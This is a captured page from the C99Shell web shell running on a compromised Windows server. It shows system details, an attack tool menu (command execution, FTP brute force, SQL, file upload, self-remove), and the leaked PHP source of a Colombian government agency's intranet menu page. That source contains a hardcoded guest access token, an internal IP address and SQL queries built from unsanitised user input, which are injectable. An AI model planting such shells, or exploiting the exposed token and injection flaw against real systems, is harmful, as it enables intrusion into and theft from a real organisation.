!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\phpscripts\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     sysmenu2.php (6.79 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$codigosec
=17;
require(
'contar.php');

$soi = isset($user);
if (
$soi == true and $user == "guest") {
$connapr='truex2jfbd373hdag64893n84893652bnd7634';
}

$sed = isset($connapr);
if (
$sed == false) {
exit;
}else{
require(
'fechaloc.php');
if (
$connapr==$xihs) {


?>



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Administrador General de Aplicaciones (Web-SIA)</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
a {
    color: #0099CC;
    text-decoration: none;
}
a:hover {
    color: #0099CC;
    text-decoration: underline;
}
input {
    font-family: Verdana, Arial, Helvetica, sans-serif;
    font-size: 12px;
    color: #666666;
    background-color: #F0F0F0;
}
-->
</style>
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_popupMsg(msg) { //v1.0
  alert(msg);
}
//-->
</script>
</head>

<body topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td><div align="center"><img src="admon1e.gif" width="545" height="142"></div></td>
  </tr>
  <tr>
    <td><table width="100%" border="1" cellpadding="5" cellspacing="0" bordercolor="#FFFFFF">
        <tr> 
          <td width="60%" valign="top" bordercolor="#CCCCCC"> 
            <table width="100%" border="1" cellpadding="2" cellspacing="0" bordercolor="#FFFFFF">
              <tr> 
                <td bgcolor="#FF9999"> 
                  <div align="center"><font color="#FFFFFF" size="2" face="Verdana, Arial, Helvetica, sans-serif"><strong>Bienvenido...</strong></font></div></td>
              </tr>
              <tr> 
                <td> <table width="100%" border="1" cellpadding="4" cellspacing="0" bordercolor="#FFFFFF">
                    <tr>
                    <?php
          
require('conexion3.php');
            
$consul "SELECT *
            FROM news where cat=15"
            
" order by fecha DESC limit 0,1";
            
$result mysql_query($consul,$db);
            
$num_filas mysql_num_rows($result);
            while (
$myrow mysql_fetch_array($result))
            {
            
$idacc1 $myrow["id"];
            
$descriacc1 $myrow["descri"];
            
$catacc1 $myrow["cat"];
            
$fechara $myrow["fecha"];
            
$fichero $myrow["fichero"];
            
$tax $myrow["texto"];
            
$titularacc1 $myrow["titular"];
            
$resto str_replace("\n""<br>"$tax);
            
$cesto str_replace("\n""<br>"$descriacc1);
            
            
            
?> 
                      <td width="144" valign="top"><a href="http://192.168.10.3/php/reqair.php?patron=1.02"><img src="<?php echo $fichero?>" alt="Ver Informes..." width="144" height="205" border="1"></a></td>
                      <td valign="top"> <p><font color="#6699CC" size="3" face="Verdana, Arial, Helvetica, sans-serif"><img src="xpeo.gif" width="272" height="29"><br>
                          </font><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><font color="#6699CC" size="1"><strong><font color="#999999"> 
                          Fecha: 
                          <?php 
                          
require('hoy.php');
                          
$fe $mday " de " $month " de " $year;
                          echo 
$fe?>
                          </font></strong></font></font><font color="#999999"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"> 
                          </font></strong></font></p>
                        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><font color="#6699CC" size="1"><strong><font color="#999999"><img src="puni.gif" width="12" height="12"></font></strong></font> 
                          <a href="requirenew3.php?id=<?php echo $idacc1?>"><strong><?php echo $titularacc1?></strong></a></font></p>
                        <p><font size="2" face="Verdana, Arial, Helvetica, sans-serif"> 
                          <?php echo $cesto?></font></p>
                        <?php ?>
                      </td>
                    </tr>
                  </table></td>
              </tr>
              <tr> 
                <td bgcolor="#FFFFFF">&nbsp;</td>
              </tr>
            </table>
          </td>
          <td valign="top" bordercolor="#CCCCCC"> 
            <form name="form1" method="post" action="">
              <table width="100%" border="1" cellpadding="2" cellspacing="0" bordercolor="#FFFFFF">
                <tr> 
                  <td colspan="2" bgcolor="#CCCCCC"><div align="center"><font color="#999999" size="2" face="Verdana, Arial, Helvetica, sans-serif">Usuario: 
                      <strong> <font color="#666666"><?php echo $user?> </font></strong></font></div></td>
                </tr>
                <tr> 
                  <td colspan="2"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Men&uacute;</strong> 
                      de Aplicaciones Disponibles para este Usuario</font></div></td>
                </tr>
                <?php
                
require('conexion.php');
                    
$consul "SELECT *
                    FROM usrs where user='
$user'"
                    
" order by aplyid";
                    
$result mysql_query($consul,$db);
                    
$num_filas mysql_num_rows($result);
                    while (
$myrow mysql_fetch_array($result))
                    {
                    
$aaply $myrow["aplyid"];
                    
$consula "SELECT *
                    FROM aplica where id='
$aaply'";
                    
$resulta mysql_query($consula,$db);
                    
$num_filasa mysql_num_rows($resulta);
                    while (
$myrowa mysql_fetch_array($resulta))
                    {
                    
$one $myrowa["nombre"];
                    
$dos $myrowa["label"];
                    
$tre $myrowa["link"];
                    }
                    
$xsi $one "/" $dos;
                    
$user strtoupper($user);
                    
?>
                <tr> 
                  <td width="20%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><img src="icoadmin.gif" width="35" height="23"></font></div></td>
                  <td width="80%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="<?php echo $tre?>?user=<?php echo $user?>" onmouseover="javascript:window.status='<?php echo $xsi?>'; return true;" onmouseout="javascript:window.status=''; return true;" oncontextmenu="MM_popupMsg('SYS Apply DAMA 2004'); return false;"><?php echo $xsi?></a></font></td>
                </tr>
                <?php
                
}
                
?>
              </table>
            </form></td>
        </tr>
      </table></td>
  </tr>
  <tr>
    <td><div align="center"><font color="#FFFFFF" size="1" face="Verdana, Arial, Helvetica, sans-serif">----------</font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><br>
        </font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> Cont&aacute;ctenos 
        en: <a href="mailto:sistemas@dama.gov.co">sistemas@dama.gov.co</a><br>
        &copy; Todos los Derechos Reservados para el DAMA<br>
        Bogot&aacute;, Colombia. 2003 - 2004</font></div></td>
  </tr>
</table>
</body>
</html>
<?php
}}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--